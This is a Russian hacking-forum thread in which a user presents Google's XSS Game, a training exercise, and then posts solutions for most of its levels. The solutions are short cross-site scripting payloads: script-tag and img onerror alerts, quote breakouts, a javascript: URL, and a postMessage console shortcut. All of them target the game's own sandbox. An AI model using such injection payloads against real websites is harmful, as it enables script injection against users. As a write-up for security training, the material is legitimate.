Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
Показано с 1 по 3 из 3
  1. #1
    TopicStarter
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность

    XSS Game от Google

    Cross-site scripting (XSS) — очень неприятная штука. Многие компании, в том числе Google, платят сторонним хакерам за поиск таких багов на своих сайтах. Чтобы научить молодёжь искать XSS, компания Google разработала тренировочную игру. Её участники должны искать и эксплуатировать уязвимости подобного типа.

    Например, на первом уровне есть уязвимый сайт, который просто добавляет введённый пользователем текст в код страницы без правильной защиты. Задача — отобразить всплывающее окно alert() во фрейме с тестовым заданием. Ссылка на следующий уровень появляется только после выполнения предыдущего задания.


    На втором уровне уже такие фокусы уже не проходят, зато есть тег <img>. Можно вводить запросы в поисковую строку и редактировать URL. Разрешается смотреть исходник фрейма, пользоваться средствами разработчика в браузере и т.д.

    Для тренировки в поиске XSS-уязвимостей есть ещё задания на сайте [Только зарегистрированные могут видеть это. ]
    Последний раз редактировалось Suicidemouse; 30.05.2014 в 16:57.

  2. 2 пользователя(ей) сказали cпасибо:
    adminWijaxu
  3. #2
    TopicStarter
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Чего то я залип на 3ем уровне) туплю сегодня походу.

  4. #3
    TopicStarter
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Ну раз никому не интересно то выложу прохождение.
    1)

    Скрытый текст

    https://xss-game.appspot.com/level1/frame?query=<script>alert()</script>
    [свернуть]

    2)

    Скрытый текст

    <img src="/static/level2_icon.png" onerror=alert()>
    [свернуть]

    3)

    Скрытый текст

    '
    [свернуть]

    4)

    Скрытый текст

    ')/ alert('
    [свернуть]

    5)

    Скрытый текст

    javascript:alert()
    [свернуть]

    6)

    Скрытый текст

    [Только зарегистрированные могут видеть это. ]
    [свернуть]


    Универсальное решение

    Скрытый текст

    parent.postMessage("success", "*")
    [свернуть]
    из консоли))

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  

Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.